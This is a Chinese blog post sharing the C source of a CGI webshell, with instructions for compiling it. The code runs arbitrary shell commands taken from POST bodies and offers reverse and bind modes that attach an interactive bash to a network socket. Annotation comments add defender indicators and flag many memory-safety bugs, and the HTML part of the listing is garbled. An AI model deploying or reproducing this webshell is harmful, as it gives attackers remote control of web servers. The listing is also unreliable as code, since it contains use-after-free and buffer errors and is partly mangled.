分类: C/C++

2015-02-03 11:51:52

C实现的cgi webshell



  1. #include <stdio.h>
  2. #include <stdio.h>
  3. #include <string.h>
  4. #include <unistd.h>
  5. #include <stdlib.h>
  6. #include <sys/types.h>
  7. #include <sys/socket.h>
  8. #include <netinet/in.h>
  9. #include <arpa/inet.h>
  10. #include <netdb.h>
  11. #include <signal.h>
  12.  

  13.  
  /* One key=value pair taken from QUERY_STRING.  parser_get() fills both
   * fields byte by byte and appends a NUL.  There is no per-field length
   * check; the only bound is the 100-character cap parser_get() places on
   * the whole query string, so a 100-character key still overruns key[]
   * by the terminator byte (undefined behaviour). */
  14. struct get_data {
  15.     char key[100];
  16.     char value[100];
  17. };
  18.  
  19.  
  /*
   * exec_cmd: the webshell's "command execution" mode (main() calls it on a
   * POST request).  The raw POST body is handed to popen() unchanged and run
   * by /bin/sh; whatever the command writes to stdout is copied byte by byte
   * into the HTTP response.  There is no authentication and no validation:
   * every byte of the request body is attacker-controlled shell input.
   *
   * Defender notes: the process lineage is web server -> CGI binary ->
   * /bin/sh -c <request body>.  Alert on CGI children spawning a shell,
   * deny the web server account the ability to exec interpreters, and treat
   * any CGI that reads CONTENT_LENGTH bytes straight into popen() as
   * malicious.  Never returns: every path ends in exit(0).
   */
  20. void exec_cmd(void){
  21.     printf("Content-type:text/html\n\n");
  22.     FILE *command;
          // CONTENT_LENGTH is client-supplied.  getenv() returns NULL when
          // the header is absent and atoi() reports no errors, so a missing,
          // negative or non-numeric value is not handled here.
  23.     int size = atoi(getenv("CONTENT_LENGTH"));
          // Only an upper bound is enforced; a negative size passes this test.
  24.     if(size > 1500) {
  25.         printf("Error> Post Data is very big");
  26.         exit(0);
  27.     }
          // One extra byte is allocated but never written, and the fread()
          // result is ignored, so the command line passed to popen() has no
          // guaranteed terminator (undefined behaviour, not a length check).
  28.     char *buffer = malloc(size+1);
  29.     fread(buffer,1,size,stdin);
          // The request body *is* the shell command line; popen() may also
          // return NULL, which is not checked before fgetc()/pclose().
  30.     command = popen(buffer,"r");
  31.     char caracter;
  32.  
          // The loop condition tests the byte itself, so a NUL in the
          // command's output ends the copy early.  The EOF comparison is made
          // on a plain char, which is unreliable where char is unsigned.
  33.     while((caracter = fgetc(command))){
  34.         if(caracter == EOF) break;
  35.         printf("%c",caracter);
  36.     }
  37.  
  38.     pclose(command);
  39.     free(buffer);
  40.     exit(0);
  41. }
  42.  
  int error(char *err){
      /* Report errno for the operation named by err via perror() and
       * terminate the CGI with EXIT_FAILURE.  Declared int but never
       * returns; it is not called anywhere in the visible code. */
      const int status = EXIT_FAILURE;
      perror(err);
      exit(status);
  }
  47.  
  /*
   * parser_get: the webshell's reverse/bind shell mode (main() calls it when
   * QUERY_STRING is non-empty).  QUERY_STRING is split into key=value pairs;
   * "type" (reverse|bind), "port" and, for reverse, "host" are read, and a
   * child is forked whose stdin/stdout/stderr are dup2()'d onto a TCP socket
   * before it exec's "/bin/bash -i":
   *   - type=reverse: connect() out to host:port, then attach bash.
   *   - type=bind:    bind()/listen() on INADDR_ANY:port, accept() once,
   *                   then attach bash.
   * The parent always exit()s, leaving the detached child behind.
   *
   * Defender notes: the indicator is a CGI process running as the web
   * server's account that opens an outbound connection or a new listening
   * port and then exec's /bin/bash with all three standard descriptors
   * pointing at a socket.  The response body carries the literal banners
   * "Connect with sucess !!!" / "Listen on port %d".  Egress filtering from
   * the web tier, a no-shell web server account and process-lineage
   * monitoring each catch this.  Never returns.
   */
  48. void parser_get(void){
  49.     printf("Content-type:text/html\n\n");
  50.  
  51.     struct get_data *s;
          // main() only reaches here when QUERY_STRING is non-empty, so GET
          // is non-NULL in that call path; called any other way, strlen(NULL)
          // below is undefined behaviour.
  52.     char *GET = (char *)getenv("QUERY_STRING");
  53.     int i,number_of_get = 0,size_get = strlen(GET);
  54.  
          // Whole-query cap; this is the only bound on the key/value fields.
  55.     if(strlen(GET) > 100)
  56.         exit(0);
  57.  
          // number_of_get is still 0 here, so this is a zero-length
          // allocation: every s[element] store in the loop below writes past
          // the end of the block (undefined behaviour).
  58.     s = (struct get_data *)malloc(number_of_get*sizeof(struct get_data));
  59.  
          // id: 0 while copying a key, 1 while copying a value.
          // positionA/positionB: write offsets into key[]/value[].
  60.     int element = 0;
  61.     int positionA = 0;
  62.     int positionB = 0;
  63.     int id = 0;
  64.  
  65.     for(i=0;i<size_get;i++){
  66.         if(GET[i] == '='){
  67.             id = 1;
  68.             s[element].key[positionA] = '\0';
  69.             positionB = 0;
  70.             continue;
  71.         }
  72.  
  73.         if(GET[i] == '&'){
  74.             id = 0;
  75.             s[element].key[positionA] = '\0';
  76.             s[element].value[positionB] = '\0';
  77.             positionA = 0;
  78.             positionB = 0;
  79.             element++;
  80.             continue;
  81.         }
  82.  
  83.         if(id==0){
  84.             s[element].key[positionA] = GET[i];
  85.             positionA++;
  86.         }
  87.  
  88.         if(id==1){
  89.             s[element].value[positionB] = GET[i];
  90.             positionB++;
  91.         }
  92.  
              // Terminate the final pair when the string does not end in '&'.
  93.         if(i == size_get-1 && GET[size_get-1] != '&'){
  94.             s[element].key[positionA] = '\0';
  95.             s[element].value[positionB] = '\0';
  96.             element++;
  97.             continue;
  98.         }
  99.  
  100.  
  101.     }
  102.  
          // Both 100-byte blocks are leaked immediately: the pointers are
          // overwritten with NULL and later re-pointed into s[], so the
          // free(host_x)/free(type_x) calls below never release them.
  103.     char *host_x = (char *)malloc(100);
  104.     host_x = NULL;
  105.     char *type_x = (char *)malloc(100);
  106.     type_x = NULL;
  107.     int port_x = 0;
  108.  
          // Select by key.  type_x/host_x alias storage inside s; port is
          // parsed with atoi(), so non-numeric input silently becomes 0.
  109.     for(i=0;i<element;i++){
  110.         if(strcmp(s[i].key,"type")==0)
  111.             type_x = s[i].value;
  112.         else if(strcmp(s[i].key,"host")==0)
  113.             host_x = s[i].value;
  114.         else if(strcmp(s[i].key,"port")==0)
  115.             port_x = atoi(s[i].value);
  116.     }
  117.  
          // s is released here while type_x and host_x still point into it:
          // every strcmp()/inet_addr() on them below reads freed memory, and
          // the later free(type_x)/free(host_x) calls pass pointers into an
          // already-freed block (invalid free).
  118.     free(s);
  119.  
          // No "type" key: free(NULL) is a no-op on both, then exit.
  120.     if(type_x == NULL){
  121.         free(type_x);
  122.         free(host_x);
  123.         exit(0);
  124.     }
  125.  
  126.     if( (strcmp(type_x,"")==0) || port_x <= 0 || port_x > 65535){
  127.         printf("Something is wrong ... !!!");
  128.         free(type_x);
  129.         free(host_x);
  130.         exit(0);
  131.     }
  132.  
          // host_x is still NULL when no "host" key was supplied, so this
          // strcmp() is undefined behaviour rather than a check for an
          // empty host (it only catches "host=").
  133.     if((strcmp(type_x,"reverse")==0) && (strcmp(host_x,"")==0)){
  134.         printf("You must specify a target host ...");
  135.         free(type_x);
  136.         free(host_x);
  137.         exit(0);
  138.     }
  139.  
          // reverse mode: outbound TCP connection to the caller-supplied
          // host:port from the web server's own address.
  140.     if(strcmp(type_x,"reverse") == 0){
  141.         struct sockaddr_in addr;
  142.         int msocket;
  143.         msocket = socket(AF_INET,SOCK_STREAM,0);
  144.  
  145.         if(msocket < 0){
  146.             printf("Fail to create socket");
  147.             free(host_x);
  148.             free(type_x);
  149.             exit(0);
  150.         }
  151.  
  152.         addr.sin_family = AF_INET;
  153.         addr.sin_port = htons(port_x);
              // inet_addr() takes dotted-quad only and returns INADDR_NONE on
              // a bad address; that result is never checked.
  154.         addr.sin_addr.s_addr = inet_addr(host_x);
  155.  
  156.         memset(&addr.sin_zero,0,sizeof(addr.sin_zero));
  157.  
  158.         if(connect(msocket,(struct sockaddr*)&addr,sizeof(addr)) == -1){
  159.             printf("Fail to connect\n");
  160.             free(host_x);
  161.             free(type_x);
  162.             exit(0);
  163.         }
  164.  
  165.         printf("Connect with sucess !!!\n");
  166.  
              // Child: point stdin/stdout/stderr at the socket and exec an
              // interactive bash.  execl() only returns on failure, so the
              // close()/exit() after it run only in that case.  fork() < 0
              // (failure) is not distinguished from the parent case.
  167.         if(fork() == 0){
  168.             close(0); close(1); close(2);
  169.             dup2(msocket, 0); dup2(msocket, 1); dup2(msocket,2);
  170.             execl("/bin/bash","bash","-i", (char *)0);
  171.             close(msocket);
  172.             exit(0);
  173.         }
  174.  
              // Parent: leaves the child running and finishes the request.
  175.         free(host_x);
  176.         free(type_x);
  177.         exit(0);
          // bind mode: open a listener on every interface at port_x.
  178.     } else if (strcmp(type_x,"bind")==0) {
  179.  
  180.         int my_socket, cli_socket;
  181.         struct sockaddr_in server_addr,cli_addr;
  182.  
  183.         if ((my_socket = socket(AF_INET, SOCK_STREAM, 0)) == -1){
  184.             printf("Fail to create socket");
  185.             exit(1);
  186.         }
  187.  
  188.         server_addr.sin_family = AF_INET;
  189.         server_addr.sin_port = htons(port_x);
  190.         server_addr.sin_addr.s_addr = INADDR_ANY;
              // bzero() is a legacy BSD call; the literal 8 presumably matches
              // sizeof sin_zero on the target ABI (unlike the memset above).
  191.         bzero(&(server_addr.sin_zero), 8);
  192.  
              // SO_REUSEADDR lets the listener rebind immediately after a
              // previous instance exits; the return value is unchecked.
  193.         int optval = 1;
  194.         setsockopt(my_socket, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof optval);
  195.  
  196.  
              // sizeof(struct sockaddr) is passed instead of sizeof server_addr;
              // the two are the same size on common platforms — assumption.
  197.         if (bind(my_socket, (struct sockaddr *)&server_addr, sizeof(struct sockaddr))== -1){
  198.             printf("Fail to bind");
  199.             free(host_x);
  200.             free(type_x);
  201.             exit(1);
  202.         }
  203.  
  204.         if (listen(my_socket, 1) < 0){
  205.             printf("Fail to listen");
  206.             free(host_x);
  207.             free(type_x);
  208.             exit(1);
  209.         } else {
  210.             printf("Listen on port %d\n",port_x);
  211.         }
  212.  
              // Child: block in accept() for a single inbound connection, then
              // attach bash to it exactly as in reverse mode.  If execl()
              // fails the child falls through to the parent's cleanup below.
  213.         if(fork() == 0){
  214.             socklen_t tamanho = sizeof(struct sockaddr_in);
  215.  
  216.             if ((cli_socket = accept(my_socket, (struct sockaddr *)&cli_addr,&tamanho)) < 0){
  217.                 exit(0);
  218.  
  219.             }
  220.  
  221.             close(0); close(1); close(2);
  222.             dup2(cli_socket, 0); dup2(cli_socket, 1); dup2(cli_socket,2);
  223.  
  224.             execl("/bin/bash","bash","-i",(char *)0);
  225.             close(cli_socket);
  226.  
  227.         }
  228.  
  229.     }
          // Reached by the parent in bind mode, by any unknown "type", and by
          // a bind-mode child whose execl() failed.  host_x/type_x are NULL
          // or point into the freed s block, so these free() calls release
          // nothing valid.
  230.     free(host_x);
  231.     free(type_x);
  232.     exit(0);
  233. }
  234.  
  void load_css_js(void){
      /* Emits the page's style/script section.  In this copy of the listing
       * the HTML was stripped by the blog editor, so the function only
       * writes two newlines to stdout. */
      fputs("\n\n", stdout);
  }
  241.  
  242. int main(void){
  243.     if(strcmp(getenv("REQUEST_METHOD"),"POST") == 0) exec_cmd();
  244.     if(strcmp(getenv("QUERY_STRING"),"") != 0) parser_get();
  245.     printf("Content-type:text/html\n\n");
  246.  
  247.     printf("\n");
  248.     printf("\t\n\tContent-type\" content=\"text/html;charset=UTF-8\">\n");
  249.     printf("\t\t C CGI SHELL =D \n");
  250.     load_css_js();
  251.     printf("\n\t\n");
  252.     printf("\t\n");
  253. printf(" \n\
  254.     
    page-wrap\">\n\
  255.     

    C - CGI SHELL

    C0d3r: webshell | REVERSE/BIND
    \n\
  256.     
    \n\
  257.     text\" style=\"width:300px;\" id=\"xxx\" onkeyup=\"if(event.keyCode == 13) document.getElementById('lol').click()\">\n\
  258.     " type=\"button\" value=\"Run Command\" onclick=\"exec_cmd()\">br/>\n\
  259.     
    " id='result'>
以上为部分代码(CU的富文本编辑器有些问题)


编译:
gcc shell.c -o shell.cgi

功能:
1.反弹获得shell(target作为客户端)


2.监听获得shell(target作为服务端)


3.命令行执行
